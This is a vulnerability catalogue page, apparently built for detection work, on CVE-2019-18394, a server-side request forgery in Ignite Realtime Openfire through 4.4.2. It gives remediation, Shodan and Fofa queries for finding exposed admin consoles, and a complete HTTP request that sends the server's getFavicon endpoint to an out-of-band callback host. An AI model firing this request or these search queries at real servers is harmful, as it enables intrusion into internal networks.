🔙 목록으로 돌아가기

CVE-2019-18394: Ignite Realtime Openfire <=4.4.2 - Server-Side Request Forgery

TitleIgnite Realtime Openfire <=4.4.2 - Server-Side Request Forgery
Authorpdteam
SeverityCritical
ImpactAn attacker can exploit this vulnerability to send crafted requests to internal resources, leading to unauthorized access or information disclosure.
RemediationUpgrade to the latest version of Ignite Realtime Openfire (>=4.4.3) to fix this vulnerability.
CVSS Score9.8
EPSS Score0.9388
CVE IDCVE-2019-18394
CWE IDCWE-918
Shodan Queryhttp.title:"openfire admin console"http.title:"openfire"
Fofa Querytitle="openfire"title="openfire admin console"
Tags cve cve2019 ssrf openfire oast igniterealtime vkev vuln

🔍 Vulnerability Description

Ignite Realtime Openfire through version 4.4.2 allows attackers to send arbitrary HTTP GET requests in FaviconServlet.java, resulting in server-side request forgery.

🌐 HTTP Request

GET /getFavicon?host=oast.fun? HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2019/CVE-2019-18394.yaml

🦈 Packet Capture: ⬇️ Download cve-2019-18394.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A